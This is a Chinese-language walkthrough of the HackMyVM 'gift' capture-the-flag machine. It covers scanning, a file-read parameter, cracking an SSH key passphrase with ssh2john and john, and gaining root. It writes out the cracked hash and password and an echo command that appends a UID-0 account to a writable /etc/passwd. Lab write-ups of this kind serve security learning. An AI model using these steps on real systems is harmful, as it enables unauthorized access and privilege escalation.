hackmyvm-gift-wp

gift

扫描开了22和80 80上有robots.txt

robots内容

翻译了一下：

巨型黑马羚是黑马羚的一个亚种。在所有亚种中，该物种以其庞大的体型著称，是非洲最稀有的有蹄类动物之一。这一亚种为安哥拉独有，仅存于坎甘达拉国家公园和卢安多严格自然保护区两地。

2002年安哥拉内战结束后，人们对安哥拉境内多个物种的生存状况知之甚少。当时，巨型黑马羚被认为可能已灭绝。转机出现在2004年1月——由佩德罗·瓦斯·平托博士领导的安哥拉天主教大学科学研究中心团队，在位于马兰热南部的坎甘达拉国家公园内，成功拍摄到仅存种群的首批影像证据。这标志着这个物种在历经战火洗礼后依然顽强存续。

如今，巨型黑马羚已成为安哥拉的国家象征，是安哥拉人民的骄傲。其形象深深融入国民生活：国家足球队以"黑羚羊"为名，国家航空TAAG的航徽采用其形象，首都罗安达更有一个行政区以"帕兰卡"（即黑羚羊）命名。在非洲神话体系中，与其他羚羊一样，这一物种被赋予活力、速度、美丽与敏锐视觉的象征意义。

翻译的信息没什么用，已经没其他信息了，估计是要把robots的内容生成为扫描字典。手工处理一下

又拿去扫描了下，依然没有结果。遂偷看其他人wp，发现还要把字符进行变种，a->4 e->3 li->1。属实有点扯淡了

扫描出来一个目录n3gr4

继续扫扫描到/m414nj3.php

扫到的是500，可能还要fuzz参数，发现要page

再fuzz下应该请求什么，发现存在文件读取

此时发现存在用户p4l4nc4

因此第一个flag就可以得到了

同时这个参数可以通过php://filter链进行rce，不过不能往html写webshell，继续看home的目录下的p4l4nc4，发现.ssh下有

id_rsa,可以用来登录。但是实际操作时发现私钥带了密码。

先用john的ssh2john生成哈希

python2 D:ssh2john.py  D:Downloadsctf.txt

$1318$$16$af4d19cd962d872dcef0601f52d666c2undefinedf70656e7373682d6b65792d7631000000000a6165733235362d637472000000066263727970740000001800000010af4d19cd962d872dcef0601f52d666c2000000100000000100000117000000077373682d727361000000030100010000010100ab5d9f7c0d832b9ff7fbe3f83cda5a8390c1e4ca87171979fc55a3ff37bbc3f63e662d2af5ba128605bc5c566e2e18ff64fff9a644a95ec1197f3199d383437c30ff6fa743b607dbebc072f3f497a44db96ff77fd5083a494bbf021a434d39531172fd99077c3bb859bacf1459c50987e4769136e7fbf791904858f26e2aa637b32eefc6c6ffde1a40c6592c02d89a8c8c0985971afbc7a7144dd5dc0db13ec87f868d0449751d756b658d5b8833aba4943b3be799a43e082ace7f42028beb0f6705ccd57062a4bf29acf7c039a936bf178dfed42c501369e0c0f89e8c911e259d0f12442ede76532b593b5a9273567869a9b1c69702966dfbcc2a1dbb636829000003c08e8dafebcba1768427248846b563218173fc2dc1d7ba66a71fa59aea457d4eabb951cb13dda0c1ecabf7001de65c61297d48e810a58651280d69331010931ffe33836b63f38fa1ce1755594cba29a0956d16eebc961640d598e2481f93fdc54e748914777e93c0992263775daffd0d154b9a08f2b73b1e16bf376cfc8ec864b37b9d64257e2bda58eeac3be67275df4388f6ef35149b010a8b4d95be32e78176e632720c0cb237c7fa5d1719f2674c3ac2797f060fb682f739e18dacb0c6e534cc3a1d95382b64cdfdcde58b703784b66c37b43034857be97e5478f75608e9e046c22602632dcb13ca674aef6308038a65ae9d03f2d3225710f7687cbea1ac0c4567acbe8e79be80cef1d5f9e8a1291bf47e516e57f088eb6e4c3edb980bba029354d149775f66053e70cb163a3f0f44a3e4b72c60343e5e54cd5309e31e9c8ccb9573533daf0e98ac70177b1691421dfd654bd6df18c2db84e7dd33a4cfce98e53a67518b3a158c6099757b00e09834e45a6f1056b7287a8c889380f725e11cf44e6263b097932ef8d4cf73e5db8aeec1f1326efc1391a0e4a185b9bbfa44295cced71cf0ca4d39c9a3eaa6b083edf45b90177c195885d9e3c0e644a24a841f9af4bc2e13c112df051356ac7f11b02cd3c57afee8816199a8ac915281b3ddebc004c4a4caf4e6e29492927d2d88939fe2548053531940b767e8014a564e55d536615f0448514a4e3c13c36172036a72d296a6329fd11da08bf0efa5e72de0ba2a28fb9ee73bcdd1d3656128aaffa40ae8da89ac974dec3becbe870bf817169a6bf7d5eae524ea3a037670084a669ea573313ae8652050bf7784b0e152ffe4642797df151a5719f58f8780e7fd8fbe9f7c1b1cd35bf7ba4e77d595f889610d5edbb6f81af1c1bdc69df38a13887f7d3c568c1ca48a74092944a990c1a62b398d663d277375fae877a491c582a98bc4a9ea2e6ceebb5e4a87ffa7015e834c1571add86af07a0b02f6fbb9b02ad8808700b0b7f57d76f89d1c2ce50c8bc51661ac0c4c58189cedd90437dbe9f65a33d1ebf7b8d11225041babe021c3609fa8ed27710cde77314ca7b64fc492627f29172f4ba9ffa5bd9f32a3d0e468f97939149559afa308a86e0a53d9639b7c5490bdc571b2cfc59a875e58da983de67184b9bedd8264654002224b18d6b0399a0f32013e8224679973c684efbed2f6375fb8645a6b3f050deb2e82eb3ad76f3429ecebf46d973683d7c588dc6ed47bd1f7aaf054d1476de89a38910cd8d652514e763c4c6062d497c0ee5a0f2ef4a0a8aed296e27e860e9b5f61958c1858e39aeacfa85b6146f9a5cef1621e11a9ae6990e25fundefined

爆破出来密码为friendster，由于私钥格式finalshell不支持 要用其他方法用私钥登录

p4l4nc4@4ng014:~$ ls -alt /etc/passwd -rw-rw-rw- 1 root root 1066 Nov 13 12:28 /etc/passwd

查找passwd发现可以修改，直接把本用户改成0重登一下就好，X不对，改了之后因为是root被限制登录了，所以应该新写一个用户进去再登录

在有/etc/passwd写入权限的情况下，通过写入一条账号密码，可以直接使用写入的账号密码登录服务器。

第一步：使用openssl passwd生成加密后的密码

openssl passwd -1 -salt raj #生成加密后的密码，# -salt 加盐，-1 linux密码加密方式

123@wacky #输入密码#

$1$raj$PUzoloEwPB0aeoBnAB6CO/  #加密后的密码#

第二步：追加构造好的passwd行到/etc/passwd文件中

echo 'raj:$1$raj$PUzoloEwPB0aeoBnAB6CO/:0:0::/root:/bin/bash' >>/etc/passwd #添加到root组中，#**并且用户id为0 ，登录后whoami为root**

添加好后直接su提权

原文始发于微信公众号（BlueIris）：hackmyvm-gift-wp